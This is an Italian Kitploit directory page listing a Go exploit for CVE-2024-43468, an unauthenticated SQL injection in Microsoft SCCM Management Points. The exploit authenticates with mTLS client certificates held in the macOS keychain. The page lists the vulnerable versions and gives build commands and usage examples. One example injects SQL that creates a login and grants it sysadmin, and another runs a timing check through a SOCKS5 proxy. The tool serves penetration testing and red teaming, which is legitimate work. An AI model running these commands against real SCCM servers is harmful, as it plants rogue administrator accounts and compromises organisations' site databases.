Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-43468_mTLS_go — CVE-2024-43468 Exploit di iniezione SQL per SCCM (versione con certificato client mTLS non estraibile dalla keychain di MacOS) | Kitploit
Strumenti/GitHubGitHub/nikallass/cve-2024-43468_mtls_go
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingAutenticazioneRed Teaming
GitHubnikallass/cve-2024-43468_mtls_go

CVE-2024-43468_mTLS_go

CVE-2024-43468 Exploit di iniezione SQL per SCCM (versione con certificato client mTLS non estraibile dalla keychain di MacOS)

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
321 anno faNon ancora revisionato

CVE-2024-43468 Exploit di SQL injection SCCM (versione con certificati client mTLS dal keychain di macOS)

Implementazione in Go dell'exploit CVE-2024-43468 che usa il keychain di macOS per l'autenticazione mTLS (senza bisogno di esportare le chiavi dal keychain).

Inoltre:

  • Aggiunto supporto proxy per non usare i problematici proxychains.
  • Aggiunto get_cert_name.py per ottenere il Common Name del certificato (sì, puoi farlo manualmente dalla GUI di Keychain Access).
  • Aggiunto un sacco di debugging per vedere cosa sta succedendo.

Basato su:

  • exploit Python originale
  • esempio di client Go mTLS

Descrizione

Sfrutta le SQL injection non autenticate in Microsoft Configuration Manager (ConfigMgr / SCCM) che consentono a un utente malintenzionato con accesso di rete a un Management Point di eseguire query SQL arbitrarie sul database del sito.

Versioni vulnerabili:

  • < 2403 (5.00.9128.1024)
  • < 2309 (5.00.9122.1033)
  • < 2303 (5.00.9106.1037)
  • <= 2211

Installazione

root@kitploit:~
# Clone repository
git clone https://github.com/nikallass/CVE-2024-43468_mTLS_go
cd CVE-2024-43468_mTLS_go

# Install dependencies
go get github.com/google/uuid
go get golang.org/x/net/proxy

# Build
go build -o sccm

Utilizzo

root@kitploit:~
# Show help
./sccm -h

# Basic usage (creating new admin)
./sccm -t https://sccm-mp.local \
       -sql "create login user123 with password = 'Password123'; exec master.dbo.sp_addsrvrolemember 'user123', 'sysadmin'" \
       -cn "CertificateCommonName"

# With custom proxy (check with sleep 5)
./sccm -t https://sccm-mp.local \
       -sql "WAITFOR DELAY '0:0:5'" \
       -cn "CertificateCommonName" \
       -proxy "127.0.0.1:9050"

Parametri

  • -t : URL del target (obbligatorio)
  • -sql : Query SQL da eseguire (obbligatorio)
  • -cn : Common Name del certificato nel keychain di macOS (obbligatorio)
  • -proxy : Indirizzo del proxy SOCKS5 (predefinito: vuoto)

Requisiti

  • macOS (per l'integrazione con Keychain)
  • Go 1.16+
  • Certificato client nel keychain di macOS
  • opzionale: proxy SOCKS5

Riferimenti

  • Avviso Microsoft
  • Avviso Synacktiv
  • Esempio di client Go mTLS
Scarica lo strumento